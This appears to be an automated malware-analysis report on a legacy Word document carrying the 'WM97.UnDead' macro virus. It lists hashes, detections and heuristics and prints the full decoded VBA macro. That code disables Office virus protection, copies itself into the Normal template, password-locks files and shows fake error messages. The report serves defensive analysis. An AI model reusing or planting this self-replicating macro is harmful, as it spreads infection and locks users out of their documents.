Office (OLE) malware analysis — malicious · c2a13e724d5a4086

MALICIOUS

Office (OLE)

48.0 KB Created: 1999-03-23 12:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 8b0baa2697b154a3de6292d571fdc451 SHA-1: b55063e4cda92da0c90bf8b4a309a92ac81de92c SHA-256: c2a13e724d5a4086dfc359f27b77c66db9350e867040bc2b41b4260090b1b765

288 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is a legacy Word document containing a WordBasic macro that attempts to copy itself to the Normal template and the active document, indicating a potential infection mechanism. The document body explicitly instructs the user to download a zip file named 'HYP M7.UnDead.zip', suggesting a social engineering lure. The presence of legacy macro markers and the AutoOpen macro further support its malicious intent.

Heuristics 6

ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Beauty-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    Options.VirusProtection = False
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 49,152 bytes but its declared streams total only 24,711 bytes — 24,441 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2892 bytes
SHA-256: `f52196a1057ccff58433fb6db011ed2ee4d52b20da48cf3336194eb83818f0ea`
Detection ClamAV: Doc.Trojan.DWMVCK1-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "UnDead" Sub AutoOpen() Attribute AutoOpen.VB_Description = "[ UnDead Virus Team ]" Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.Stupid.AutoOpen" On Error GoTo Stupid Payload Application.ScreenUpdating = False Application.DisplayAlerts = wdAlertsNone WordBasic.DisableAutoMacros 0 Options.VirusProtection = False Set ActiveDoc = ActiveDocument Set GlobalDoc = NormalTemplate DocumentInstalled = False GlobalInstalled = False For I = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(I).Name = "UnDead" Then DocumentInstalled = True End If Next For J = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(J).Name = "UnDead" Then GlobalInstalled = True End If Next If DocumentInstalled = False Then Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="UnDead", Object:=wdOrganizerObjectProjectItems ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate End If If GlobalInstalled = False Then Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UnDead", Object:=wdOrganizerObjectProjectItems Options.SaveNormalPrompt = False End If Application.DisplayAlerts = wdAlertsAll Stupid: End Sub '------------------------------------------------------------ 'Payload macro 'Annoys the user '------------------------------------------------------------ Sub Payload() Attribute Payload.VB_Description = "[ UnDead Virus Team ]" Attribute Payload.VB_ProcData.VB_Invoke_Func = "Normal.Stupid.Payload" On Error Resume Next For B = 0 To 2 Beep Next W = Int(Rnd() * 7) + 1 T = Int(Rnd() * 2) + 1 If Day(Now()) = Int(Rnd() * 30) + 1 Or WeekDay(Now()) = W Then Hell If Day(Now()) = Int(Rnd() * 30) + 1 Or WeekDay(Now()) = T Then Virus WordBasic.FileSaveAs Format:=1 End Sub Private Sub Hell() Dim fp$ Dim fn$ fp$ = WordBasic.[Time$]() fn$ = WordBasic.[FileName$]() WordBasic.ToolsOptionsSave Password:=fp$, WritePassword:=fp$ WordBasic.MsgBox "oh no!!!, your file was infected by virus", "WM97.UnDead", 16 WordBasic.FileExit 1 End Sub Private Sub Virus() frmVirus.Show End Sub Sub ToolsMacro() MsgBox "Error office97.dll", vbCritical, Title:="WM97.UnDead" End Sub Sub ViewVBCode() MsgBox "Microsoft VBA", Title:="WM97.UnDead" End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.